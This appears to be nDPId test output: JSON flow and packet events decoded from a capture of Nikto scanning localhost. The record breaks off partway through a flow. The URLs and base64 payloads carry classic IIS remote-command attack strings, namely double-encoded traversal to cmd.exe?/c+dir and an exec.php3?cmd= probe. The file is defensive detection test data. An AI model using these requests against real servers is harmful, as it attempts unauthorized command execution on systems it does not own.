00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":741,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":741,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277889,"flow_last_seen":1576420277889,"flow_idle_time":7580000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"midstream":1,"thread_ts_msec":1576420277889,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51044,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00691{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":741,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":741,"flow_packet_id":1,"flow_last_seen":1576420277889,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":225,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":225,"pkt_l4_len":191,"thread_ts_msec":1576420277889,"pkt":"AAAAAAAAAAAAAAAACABFAADTtGFAAEAGh8F\/AAABfwAAAcdkH5BoGo0gUvgPHYAYAED+xwAAAQEICp1m\/6mdZv+pR0VUIC9hZG1pbi9leGVjLnBocDM\/Y21kPWRpciUyMGM6XFwgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMyMTkpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01076{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":741,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":741,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277889,"flow_last_seen":1576420277889,"flow_idle_time":7580000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"midstream":1,"thread_ts_msec":1576420277889,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51044,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin\/exec.php3?cmd=dir%20c:\\\\","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003219)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":742,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":742,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277890,"flow_last_seen":1576420277890,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277890,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51046,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":742,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":742,"flow_packet_id":1,"flow_last_seen":1576420277890,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420277890,"pkt":"AAAAAAAAAAAAAAAACABFAADHrzRAAEAGjPp\/AAABfwAAAcdmH5C4mZZz5s98MYAYAED+uwAAAQEICp1m\/6qdZv+qR0VUIC9pc2FwaS90c3Rpc2FwaS5kbGwgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzI2MykNCg0K"}
01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":742,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":742,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277890,"flow_last_seen":1576420277890,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277890,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51046,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/isapi\/tstisapi.dll","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003263)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":743,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":743,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277892,"flow_last_seen":1576420277892,"flow_idle_time":7580000,"flow_min_l4_payload_len":173,"flow_max_l4_payload_len":173,"flow_tot_l4_payload_len":173,"midstream":1,"thread_ts_msec":1576420277892,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51048,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00710{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":743,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":743,"flow_packet_id":1,"flow_last_seen":1576420277892,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1576420277892,"pkt":"AAAAAAAAAAAAAAAACABFAADhOMJAAEAGA1N\/AAABfwAAAcdoH5DDTQGCjXG7iYAYAED+1QAAAQEICp1m\/6ydZv+sR0VUIC9jZXJ0c3J2Ly4uJTI1NWN3aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzI5NCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01091{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":743,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":743,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277892,"flow_last_seen":1576420277892,"flow_idle_time":7580000,"flow_min_l4_payload_len":173,"flow_max_l4_payload_len":173,"flow_tot_l4_payload_len":173,"midstream":1,"thread_ts_msec":1576420277892,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51048,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/certsrv\/..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003294)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":744,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":744,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277893,"flow_last_seen":1576420277893,"flow_idle_time":7580000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"midstream":1,"thread_ts_msec":1576420277893,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51050,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00732{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":744,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":744,"flow_packet_id":1,"flow_last_seen":1576420277893,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":253,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":253,"pkt_l4_len":219,"thread_ts_msec":1576420277893,"pkt":"AAAAAAAAAAAAAAAACABFAADvSZpAAEAG8mx\/AAABfwAAAcdqH5B\/BnDaXNCp24AYAED+4wAAAQEICp1m\/62dZv+tR0VUIC9jZ2ktYmluLy4uJTI1NWMuLiUyNTVjLi4lMjU1Y3dpbm50L3N5c3RlbTMyL2NtZC5leGU\/L2MrZGlyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAzMjk1KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01105{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":744,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":744,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277893,"flow_last_seen":1576420277893,"flow_idle_time":7580000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"midstream":1,"thread_ts_msec":1576420277893,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51050,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin\/..%255c..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003295)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":745,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":745,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277895,"flow_last_seen":1576420277895,"flow_idle_time":7580000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"midstream":1,"thread_ts_msec":1576420277895,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51052,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00723{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":745,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":745,"flow_packet_id":1,"flow_last_seen":1576420277895,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":248,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":248,"pkt_l4_len":214,"thread_ts_msec":1576420277895,"pkt":"AAAAAAAAAAAAAAAACABFAADqfTRAAEAGvtd\/AAABfwAAAcdsH5BhnER0\/MAlIYAYAED+3gAAAQEICp1m\/6+dZv+vR0VUIC9paXNhZG1wd2QvLi4lMjU1Yy4uJTI1NWN3aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAzMjk2KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
01100{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":745,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":745,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277895,"flow_last_seen":1576420277895,"flow_idle_time":7580000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"midstream":1,"thread_ts_msec":1576420277895,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51052,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/iisadmpwd\/..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003296)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":746,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":746,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277896,"flow_last_seen":1576420277896,"flow_idle_time":7580000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":192,"midstream":1,"thread_ts_msec":1576420277896,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51054,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00735{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":746,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":746,"flow_packet_id":1,"flow_last_seen":1576420277896,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":258,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":258,"pkt_l4_len":224,"thread_ts_msec":1576420277896,"pkt":"AAAAAAAAAAAAAAAACABFAAD0gMpAAEAGuzd\/AAABfwAAAcduH5Bs5rmLXk\/vk4AYAED+6AAAAQEICp1m\/7CdZv+wR0VUIC9tc2FkYy8uLiUyNTVjLi4lMjU1Yy4uJTI1NWMuLiUyNTVjd2lubnQvc3lzdGVtMzIvY21kLmV4ZT8vYytkaXIgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMyOTcpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01110{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":746,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":746,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277896,"flow_last_seen":1576420277896,"flow_idle_time":7580000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":192,"midstream":1,"thread_ts_msec":1576420277896,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51054,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/msadc\/..%255c..%255c..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003297)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":747,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":747,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277898,"flow_last_seen":1576420277898,"flow_idle_time":7580000,"flow_min_l4_payload_len":188,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":188,"midstream":1,"thread_ts_msec":1576420277898,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51056,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00730{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":747,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":747,"flow_packet_id":1,"flow_last_seen":1576420277898,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":254,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":254,"pkt_l4_len":220,"thread_ts_msec":1576420277898,"pkt":"AAAAAAAAAAAAAAAACABFAADwDYtAAEAGLnt\/AAABfwAAAcdwH5DXOjTMIaH3HYAYAED+5AAAAQEICp1m\/7GdZv+xR0VUIC9wYnNlcnZlci8uLiUyNTVjLi4lMjU1Yy4uJTI1NWN3aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpciBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzI5OCkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01106{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":747,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":747,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277898,"flow_last_seen":1576420277898,"flow_idle_time":7580000,"flow_min_l4_payload_len":188,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":188,"midstream":1,"thread_ts_msec":1576420277898,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51056,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/pbserver\/..%255c..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003298)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":748,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":748,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277899,"flow_last_seen":1576420277899,"flow_idle_time":7580000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"midstream":1,"thread_ts_msec":1576420277899,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51058,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00714{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":748,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":748,"flow_packet_id":1,"flow_last_seen":1576420277899,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":242,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":242,"pkt_l4_len":208,"thread_ts_msec":1576420277899,"pkt":"AAAAAAAAAAAAAAAACABFAADkYvBAAEAG2SF\/AAABfwAAAcdyH5AooFut2XrcJYAYAED+2AAAAQEICp1m\/7OdZv+zR0VUIC9ycGMvLi4lMjU1Yy4uJTI1NWN3aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpciBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzI5OSkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01094{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":748,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":748,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277899,"flow_last_seen":1576420277899,"flow_idle_time":7580000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"midstream":1,"thread_ts_msec":1576420277899,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51058,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/rpc\/..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003299)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":749,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":749,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277901,"flow_last_seen":1576420277901,"flow_idle_time":7580000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"midstream":1,"thread_ts_msec":1576420277901,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51060,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00718{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":749,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":749,"flow_packet_id":1,"flow_last_seen":1576420277901,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":246,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":246,"pkt_l4_len":212,"thread_ts_msec":1576420277901,"pkt":"AAAAAAAAAAAAAAAACABFAADogDVAAEAGu9h\/AAABfwAAAcd0H5COI7lxOfsaCoAYAED+3AAAAQEICp1m\/7WdZv+1R0VUIC9zY3JpcHRzLy4uJTI1NWMuLiUyNTVjd2lubnQvc3lzdGVtMzIvY21kLmV4ZT8vYytkaXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMzMDApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01098{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":749,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":749,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277901,"flow_last_seen":1576420277901,"flow_idle_time":7580000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"midstream":1,"thread_ts_msec":1576420277901,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51060,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003300)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":750,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":750,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277902,"flow_last_seen":1576420277902,"flow_idle_time":7580000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"midstream":1,"thread_ts_msec":1576420277902,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51062,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00718{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":750,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":750,"flow_packet_id":1,"flow_last_seen":1576420277902,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":246,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":246,"pkt_l4_len":212,"thread_ts_msec":1576420277902,"pkt":"AAAAAAAAAAAAAAAACABFAADos7FAAEAGiFx\/AAABfwAAAcd2H5DBqortDeq7IYAYAED+3AAAAQEICp1m\/7adZv+2R0VUIC9zY3JpcHRzLy4uJTI1NWMuLiUyNTVjd2lubnQvc3lzdGVtMzIvY21kLmV4ZT8vYyt2ZXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMzMDEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01098{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":750,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":750,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277902,"flow_last_seen":1576420277902,"flow_idle_time":7580000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"midstream":1,"thread_ts_msec":1576420277902,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51062,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/..%255c..%255cwinnt\/system32\/cmd.exe?\/c+ver","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003301)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":751,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":751,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277903,"flow_last_seen":1576420277903,"flow_idle_time":7580000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420277903,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51064,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
